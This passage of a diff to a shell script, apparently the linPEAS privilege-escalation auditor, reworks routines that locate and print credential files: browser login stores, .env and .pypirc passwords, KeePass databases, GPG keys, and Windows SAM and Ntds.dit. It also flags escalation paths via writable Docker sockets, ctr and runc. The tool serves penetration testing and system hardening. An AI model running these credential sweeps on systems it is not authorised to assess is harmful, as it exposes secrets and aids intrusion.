\"\.pgp$\"`" ]; then echo_not_found "*.pgp"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then echo_not_found "*.gpg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analizing Cache Vi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; - ##-- SI) vi swp files - printf $Y"[+] "$GREEN"Searching vim files\n"$NC - vimfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E "\.swp$|\.viminfo$") - printf "%s\n" "$vimfiles" | sort | uniq | while read f; do - ls -l "$f" 2>/dev/null - done - echo "" ##-- SI) containerd installed - printf $Y"[+] "$GREEN"Checking if containerd(ctr) is available\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation\n"$NC + print_2title "Checking if containerd(ctr) is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" containerd=`command -v ctr` if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," ctr image list fi echo "" ##-- SI) runc installed - printf $Y"[+] "$GREEN"Checking if runc is available\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation\n"$NC + print_2title "Checking if runc is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" runc=`command -v runc` if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," fi echo "" #-- SI) Docker - printf $Y"[+] "$GREEN"Searching docker files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket\n"$NC - dockerfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'docker.socket|docker.sock|Dockerfile|docker-compose.yml') - printf "%s\n" "$dockerfiles" | while read f; do + print_2title "Searching docker files (limit 70)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" + printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do ls -l "$f" 2>/dev/null - if [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi done echo "" - #-- SI) Firefox files - printf $Y"[+] "$GREEN"Interesting Firefox Files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC - firefoxdirs=$(echo "$FIND_DIR_HOME" | grep -E '\.mozilla') - printf "%s\n" "$firefoxdirs" | while read f; do - if [ "$f" ]; then - echo "Found $f" - find "$f" -name "places.sqlite" -o -name "bookmarkbackups" -o -name "formhistory.sqlite" -o -name "handlers.json" -o -name "persdict.dat" -o -name "addons.json" -o -name "cookies.sqlite" -o -name "cache2" -o -name "startupCache" -o -name "favicons.sqlite" -o -name "prefs.js" -o -name "downloads.sqlite" -o -name "thumbnails" -o -name "logins.json" -o -name "key4.db" -o -name "key3.db" 2>/dev/null | sort - fi - done - echo "" - - #-- SI) Chrome files - printf $Y"[+] "$GREEN"Interesting Chrome Files\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC - chromedirs=$(echo "$FIND_DIR_HOME" | grep -E 'google-chrome') - printf "%s\n" "$chromedirs" | while read f; do - if [ "$f" ]; then - echo "Found $f" - find "$f" -name "History" -o -name "Cookies" -o -name "Cache" -o -name "Bookmarks" -o -name "Web Data" -o -name "Favicons" -o -name "Login Data" -o -name "Current Session" -o -name "Current Tabs" -o -name "Last Session" -o -name "Last Tabs" -o -name "Extensions" -o -name "Thumbnails" 2>/dev/null | sort - fi - done - echo "" + print_2title "Analizing Firefox Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; for ff in $(find "$f" -name "places.sqlite"); do ls -ld "$ff" | sed -${E} "s,places.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "bookmarkbackups"); do ls -ld "$ff" | sed -${E} "s,bookmarkbackups,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "formhistory.sqlite"); do ls -ld "$ff" | sed -${E} "s,formhistory.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "handlers.json"); do ls -ld "$ff" | sed -${E} "s,handlers.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "persdict.dat"); do ls -ld "$ff" | sed -${E} "s,persdict.dat,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "addons.json"); do ls -ld "$ff" | sed -${E} "s,addons.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "cookies.sqlite"); do ls -ld "$ff" | sed -${E} "s,cookies.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "cache2"); do ls -ld "$ff" | sed -${E} "s,cache2,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "startupCache"); do ls -ld "$ff" | sed -${E} "s,startupCache,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "favicons.sqlite"); do ls -ld "$ff" | sed -${E} "s,favicons.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "prefs.js"); do ls -ld "$ff" | sed -${E} "s,prefs.js,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "downloads.sqlite"); do ls -ld "$ff" | sed -${E} "s,downloads.sqlite,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "thumbnails"); do ls -ld "$ff" | sed -${E} "s,thumbnails,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "logins.json"); do ls -ld "$ff" | sed -${E} "s,logins.json,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "key4.db"); do ls -ld "$ff" | sed -${E} "s,key4.db,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "key3.db"); do ls -ld "$ff" | sed -${E} "s,key3.db,${SED_RED},"; done; echo "";done; echo ""; + + + print_2title "Analizing Chrome Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analizing Autologin Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - #-- SI) Autologin files - printf $Y"[+] "$GREEN"Autologin Files\n"$NC - autologinfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT" | grep -E 'autologin|autologin.conf') - printf "%s\n" "$autologinfiles" | while read f; do - if [ "$f" ]; then - echo "$f" - ls -l "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," - echo "" - fi - done - echo "" #-- SI) S/Key athentication - printf $Y"[+] "$GREEN"S/Key authentication\n"$NC + print_2title "S/Key authentication" if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep skey`" ]; then printf "System supports$RED S/Key$NC authentication\n" if ! [ -d /etc/skey/ ]; then echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif [ -w /etc/skey/ ]; then + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then echo "${RED}/etc/skey/ is writable by you" ls -ld /etc/skey/ else @@ -2740,12 +2567,12 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) YubiKey athentication - printf $Y"[+] "$GREEN"YubiKey authentication\n"$NC + print_2title "YubiKey authentication" if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep yubikey`" ]; then printf "System supports$RED YubiKey$NC authentication\n" - if [ -w /var/db/yubikey/ ]; then + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ + ls -ld /var/db/yubikey/ else ls -ld /var/db/yubikey/ 2>/dev/null fi @@ -2753,31 +2580,129 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) Passwords inside pam.d - printf $Y"[+] "$GREEN"Passwords inside pam.d\n"$NC - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${C}[1;31m&${C}[0m," + print_2title "Passwords inside pam.d" + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," echo "" - #-- SI) FastCGI params - printf $Y"[+] "$GREEN"FastCGI Params\n"$NC - fastcgi_paramsfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'fastcgi_params') - printf "%s\n" "$fastcgi_paramsfiles" | while read f; do - if [ "$f" ]; then - ls -l "$f" 2>/dev/null - cat "$f" 2>/dev/null | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${C}[1;31m&${C}[0m," - echo "" - fi - done - echo "" + print_2title "Analizing SNMP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Pypirc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Ldaprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Env Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Msmtprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Keepass Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing FTP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then echo_not_found "ftp.config"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Bind Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then echo_not_found "bind"; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "*.key"); do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing SeedDMS Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then echo_not_found "seeddms*"; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; for ff in $(find "$f" -name "settings.xml"); do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Ddclient Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then echo_not_found "ddclient.conf"; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; + + + + + print_2title "Analizing Interesting logs Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Windows Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then echo_not_found "ConsoleHost_history.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then echo_not_found "FreeSSHDservice.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then echo_not_found "NetSetup.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then echo_not_found "Ntds.dit"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then echo_not_found "RDCMan.settings"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then echo_not_found "SAM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then echo_not_found "SYSTEM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then echo_not_found "SecEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then echo_not_found "appcmd.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then echo_not_found "bash.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then echo_not_found "datasources.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then echo_not_found "default.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then echo_not_found "drives.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then echo_not_found "groups.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then echo_not_found "https-xampp.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then echo_not_found "https.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then echo_not_found "iis6.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then echo_not_found "index.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then echo_not_found "my.cnf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then echo_not_found "my.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then echo_not_found "ntuser.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then echo_not_found "pagefile.sys"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then echo_not_found "printers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then echo_not_found "scclient.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld 